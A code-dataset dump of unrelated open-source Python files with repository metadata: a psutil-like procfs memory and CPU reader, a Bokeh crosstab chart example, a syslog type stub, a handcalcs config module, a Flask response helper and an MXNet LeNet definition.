# | lib | library (unused in Linux 2.6) | lrs | |
# | data | data + stack | drs | DATA |
# | dirty | dirty pages (unused in Linux 2.6) | dt | |
# ============================================================
with open_binary("%s/%s/statm" % (self._procfs_path, self.pid)) as f:
vms, rss, shared, text, lib, data, dirty = [
int(x) * PAGESIZE for x in f.readline().split()[:7]
]
return pmem(rss, vms, shared, text, lib, data, dirty)
@wrap_exceptions
def cpu_times(self):
values = self._parse_stat_file()
utime = float(values[12]) / CLOCK_TICKS
stime = float(values[13]) / CLOCK_TICKS
children_utime = float(values[14]) / CLOCK_TICKS
children_stime = float(values[15]) / CLOCK_TICKS
return pcputimes(utime, stime, children_utime, children_stime)
|
39491ca36706604b130735169f6e384f441266c3
|
5105403f2b75990654519438d8ceabcf80962ebf
|
/examples/topics/hierarchical/crosstab.py
|
a9b5c9ea94b404bb5ee90b53237839d0dce3e921
|
[
"BSD-3-Clause"
] |
permissive
|
bokeh/bokeh
|
ed1d81eb07d27d27c6710c9fec9114886047f528
|
310cb2cbeabc4c4b8180cbda566df16039737cdc
|
refs/heads/branch-3.3
| 2023-08-31T23:53:06.537061
| 2023-08-30T03:43:05
| 2023-08-30T03:43:05
| 3,834,332
| 17,174
| 5,251
|
BSD-3-Clause
| 2023-09-14T11:37:23
| 2012-03-26T15:40:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,098
|
py
|
crosstab.py
|
''' An adjacent bar plot of Pandas crosstab data.
.. bokeh-example-metadata::
:sampledata: sample_superstore
:apis: bokeh.plotting.figure.hbar, bokeh.models.sources.ColumnDataSource
:refs: :ref:`ug_topics_hierarchical_crosstab`
:keywords: hierarchical, crosstab
'''
import pandas as pd
from bokeh.core.properties import value
from bokeh.plotting import ColumnDataSource, figure, show
from bokeh.sampledata.sample_superstore import data as df
from bokeh.transform import cumsum, factor_cmap
rows = pd.crosstab(df.Category, df.Region, aggfunc='sum', values=df.Sales, normalize="index")
source = ColumnDataSource(rows.T)
cats = ["Office Supplies", "Furniture", "Technology"]
regions = source.data["Region"]
p = figure(y_range=cats, x_range=(-0.55, 1.02), height=400, width=700, tools="",
x_axis_location=None, toolbar_location=None, outline_line_color=None)
p.grid.grid_line_color = None
p.yaxis.fixed_location = 0
p.axis.major_tick_line_color = None
p.axis.major_label_text_color = None
p.axis.axis_line_color = "#4a4a4a"
p.axis.axis_line_width = 6
source.data["color"] = [ "#dadada","#dadada", "#4a4a4a", "#dadada"]
for y in cats:
left, right = cumsum(y, include_zero=True), cumsum(y)
p.hbar(y=value(y), left=left, right=right, source=source, height=0.9,
color=factor_cmap("Region", "MediumContrast4", regions))
pcts = source.data[y]
source.data[f"{y} text"] = [f"{r}\n{x*100:0.1f}%" for r, x in zip(regions, pcts)]
p.text(y=value(y), x=left, text=f"{y} text", source=source, x_offset=10,
text_color="color", text_baseline="middle", text_font_size="15px")
totals = pd.crosstab(df.Category, df.Region, margins=True, aggfunc='sum',
values=df.Sales, normalize="columns").All
p.hbar(right=0, left=-totals, y=totals.index, height=0.9, color="#dadada")
text = [f"{name} ({totals.loc[name]*100:0.1f}%)" for name in cats]
p.text(y=cats, x=0, text=text, text_baseline="middle", text_align="right",
x_offset=-12, text_color="#4a4a4a", text_font_size="20px",
text_font_style="bold")
show(p)
|
e74a29234ec4c5b900eb06217926843e04ee1183
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/helpers/typeshed/stdlib/syslog.pyi
|
cfa8df887c1b413c1c3bf5ad384179b6e3bca828
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 1,357
|
pyi
|
syslog.pyi
|
import sys
from typing import overload
from typing_extensions import Literal
if sys.platform != "win32":
LOG_ALERT: Literal[1]
LOG_AUTH: Literal[32]
LOG_AUTHPRIV: Literal[80]
LOG_CONS: Literal[2]
LOG_CRIT: Literal[2]
LOG_CRON: Literal[72]
LOG_DAEMON: Literal[24]
LOG_DEBUG: Literal[7]
LOG_EMERG: Literal[0]
LOG_ERR: Literal[3]
LOG_INFO: Literal[6]
LOG_KERN: Literal[0]
LOG_LOCAL0: Literal[128]
LOG_LOCAL1: Literal[136]
LOG_LOCAL2: Literal[144]
LOG_LOCAL3: Literal[152]
LOG_LOCAL4: Literal[160]
LOG_LOCAL5: Literal[168]
LOG_LOCAL6: Literal[176]
LOG_LOCAL7: Literal[184]
LOG_LPR: Literal[48]
LOG_MAIL: Literal[16]
LOG_NDELAY: Literal[8]
LOG_NEWS: Literal[56]
LOG_NOTICE: Literal[5]
LOG_NOWAIT: Literal[16]
LOG_ODELAY: Literal[4]
LOG_PERROR: Literal[32]
LOG_PID: Literal[1]
LOG_SYSLOG: Literal[40]
LOG_USER: Literal[8]
LOG_UUCP: Literal[64]
LOG_WARNING: Literal[4]
def LOG_MASK(a: int) -> int: ...
def LOG_UPTO(a: int) -> int: ...
def closelog() -> None: ...
def openlog(ident: str = ..., logoption: int = ..., facility: int = ...) -> None: ...
def setlogmask(x: int) -> int: ...
@overload
def syslog(priority: int, message: str) -> None: ...
@overload
def syslog(message: str) -> None: ...
|
7a19a3dbe28dac8c9481a4f3e9c27b19512770e5
|
f2e07495a5792290008ca6190650860a77d666de
|
/handcalcs/global_config.py
|
7de335bf528311aef1655a2175eca1bcce7c8c79
|
[
"Apache-2.0"
] |
permissive
|
connorferster/handcalcs
|
9c9a644117ceb42f5dadd47e7d60d30a2353b6a0
|
56d36d2c0e51a7f0c482e991c124e50fb578cacb
|
refs/heads/main
| 2023-09-04T12:33:01.144692
| 2022-12-27T18:49:10
| 2022-12-27T18:49:10
| 241,504,436
| 5,413
| 457
|
Apache-2.0
| 2022-12-27T18:47:11
| 2020-02-19T01:18:42
|
CSS
|
UTF-8
|
Python
| false
| false
| 2,405
|
py
|
global_config.py
|
# Copyright 2020 Connor Ferster
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from typing import Any
import pathlib
_config = {}
def _load_global_config(config_file_name: str):
with open(config_file_name, "r") as config_file:
_config_data = json.load(config_file)
return _config_data
_here = pathlib.Path(__file__).parent
_config_file = _here / "config.json"
_config = _load_global_config(_config_file)
_OPTIONS = []
for key, value in _config.items():
if isinstance(value, str):
str_value = f"'{value}'"
if "\n" in str_value:
str_value = str_value.replace("\n", "\\n")
else:
str_value = str(value)
_OPTIONS.append(f"{key} -> {type(value)} (default = {str_value})")
# _OPTIONS = [f"{key} -> {type(value)} (default = {value})" for key, value in _config.items()]
_OPTIONS_TEXT = "Configuration can be set on the following options:\n\t" + "\n\t".join(
_OPTIONS
)
def set_option(option: str, value: Any) -> None:
if option in _config and isinstance(value, type(_config[option])):
_config[option] = value
elif option in _config and not isinstance(value, type(_config[option])):
raise ValueError(
f"Option, {option}, must be set with a value of type {type(_config[option])},"
f" not {type(value)}."
)
else:
raise ValueError(f"{option} is not a valid option that can be set.")
def save_config() -> None:
"""
Returns None. Saves the current global configuration as the default configuration
that will be loaded upon module import.
"""
with open(_config_file, "w", newline="") as config_file:
json.dump(_config, config_file, indent=4)
config_file.truncate()
set_option.__doc__ = f"""
Returns None. Sets the value of 'option' to 'value' in the global config.
{_OPTIONS_TEXT}
"""
|
3d5dd9de735d71d2ca724eb2c7f4c7bef321d5ec
|
085cf6512c946d615eda58a3a0d353c0aa1db8cf
|
/deepfence_backend/utils/response.py
|
5ca439c921da09bbc11960fbdc97efa2b7474b6a
|
[
"Apache-2.0"
] |
permissive
|
deepfence/ThreatMapper
|
00c38c65ed2f014004c9818f03d5e129496b4dd8
|
748b0c8782507eaf351625b9c9fad46903ad6237
|
refs/heads/main
| 2023-08-31T11:13:53.813651
| 2023-03-02T00:49:57
| 2023-03-02T00:49:57
| 238,662,977
| 4,540
| 481
|
Apache-2.0
| 2023-09-14T13:24:37
| 2020-02-06T10:30:09
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 521
|
py
|
response.py
|
from flask import jsonify
def set_response(data=None, error=None, status=200, headers=None):
response = format_response(data=data, error=error, status=status)
if headers:
return jsonify(response), status, headers
return jsonify(response), status
def format_response(data=None, error=None, status=200):
if 200 <= status < 400:
code = True
else:
code = False
response = {
'data': data,
'success': code,
'error': error
}
return response
|
cabc2f3bdbb368486ca3bd279137795b109117be
|
c618bbf2719431999b1007461df0865bab60c883
|
/docs/examples/use_cases/mxnet/resnetn/symbols/lenet.py
|
f2cc106f60acbc9e9fc3491db0355ad9889a826e
|
[
"Apache-2.0"
] |
permissive
|
NVIDIA/DALI
|
3d0d061135d19e092647e6522046b2ff23d4ef03
|
92ebbe5c20e460050abd985acb590e6c27199517
|
refs/heads/main
| 2023-09-04T01:53:59.033608
| 2023-09-01T13:45:03
| 2023-09-01T13:45:03
| 135,768,037
| 4,851
| 648
|
Apache-2.0
| 2023-09-12T18:00:22
| 2018-06-01T22:18:01
|
C++
|
UTF-8
|
Python
| false
| false
| 2,957
|
py
|
lenet.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
LeCun, Yann, Leon Bottou, Yoshua Bengio, and Patrick Haffner.
Gradient-based learning applied to document recognition.
Proceedings of the IEEE (1998)
"""
import mxnet as mx
def get_loc(data, attr={'lr_mult':'0.01'}):
"""
the localisation network in lenet-stn, it will increase acc about more than 1%,
when num-epoch >=15
"""
loc = mx.symbol.Convolution(data=data, num_filter=30, kernel=(5, 5), stride=(2,2))
loc = mx.symbol.Activation(data = loc, act_type='relu')
loc = mx.symbol.Pooling(data=loc, kernel=(2, 2), stride=(2, 2), pool_type='max')
loc = mx.symbol.Convolution(data=loc, num_filter=60, kernel=(3, 3), stride=(1,1), pad=(1, 1))
loc = mx.symbol.Activation(data = loc, act_type='relu')
loc = mx.symbol.Pooling(data=loc, global_pool=True, kernel=(2, 2), pool_type='avg')
loc = mx.symbol.Flatten(data=loc)
loc = mx.symbol.FullyConnected(data=loc, num_hidden=6, name="stn_loc", attr=attr)
return loc
def get_symbol(num_classes=10, add_stn=False, **kwargs):
data = mx.symbol.Variable('data')
if add_stn:
data = mx.sym.SpatialTransformer(data=data, loc=get_loc(data), target_shape = (28,28),
transform_type="affine", sampler_type="bilinear")
# first conv
conv1 = mx.symbol.Convolution(data=data, kernel=(5,5), num_filter=20)
tanh1 = mx.symbol.Activation(data=conv1, act_type="tanh")
pool1 = mx.symbol.Pooling(data=tanh1, pool_type="max",
kernel=(2,2), stride=(2,2))
# second conv
conv2 = mx.symbol.Convolution(data=pool1, kernel=(5,5), num_filter=50)
tanh2 = mx.symbol.Activation(data=conv2, act_type="tanh")
pool2 = mx.symbol.Pooling(data=tanh2, pool_type="max",
kernel=(2,2), stride=(2,2))
# first fullc
flatten = mx.symbol.Flatten(data=pool2)
fc1 = mx.symbol.FullyConnected(data=flatten, num_hidden=500)
tanh3 = mx.symbol.Activation(data=fc1, act_type="tanh")
# second fullc
fc2 = mx.symbol.FullyConnected(data=tanh3, num_hidden=num_classes)
# loss
lenet = mx.symbol.SoftmaxOutput(data=fc2, name='softmax')
return lenet
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.